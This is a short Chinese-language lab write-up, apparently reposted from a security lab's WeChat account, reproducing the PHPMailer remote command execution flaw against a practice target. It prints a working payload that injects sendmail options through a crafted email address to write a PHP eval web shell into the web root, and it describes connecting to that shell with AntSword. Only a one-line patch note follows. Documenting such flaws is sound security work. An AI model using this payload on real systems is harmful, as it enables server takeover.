PHPMailer远程命令执行漏洞

释放双眼,带上耳机,听听看~!

网安引领时代,弥天点亮未来   




 

写在前面:

我是一个热爱渗透测试的小白菜,最近在忙各种文档的书写,渗透能力直线下降。近期想找各大SRC打击一下自信心,今天正好碰到一个简单的漏洞环境,小白菜把自己渗透思路写下来,分享给大家。有错误和不当的地方还请大佬们指出来,毕竟我是小白菜,希望各位大佬不要喷我!

    


渗透介绍


    PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等用户量巨大的应用与框架中。

    PHPMailer为高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害


渗透过程


访问目的地址http://219.153.49.228:48698/发现是一个静态页面

通过信息收集工具nmap、burp得到如下信息

发现一个PHP页面比较可疑,通过浏览器去访问

在这里输入数据进行测试,最终通过输入以下得到webshell

Name:mitian  (可以随意写)Email: "mitian". -OQueueDirectory=/tmp/. -X/var/www/html/mitian.php @mitian.comMessage: <?php @eval($_POST[mitian]);?>

通过浏览器去访问写入的木马文件,发现成功解析!

通过蚁剑连接,拿到shell


修复建议



更新phpmailer到最新版本



学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室


本文源自微信公众号:弥天安全实验室

人已赞赏
安全工具

Apache-Struts2-045复现

2019-10-18 17:16:42

安全工具

首届弥天安全实验室技术沙龙

2019-10-18 17:17:20

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索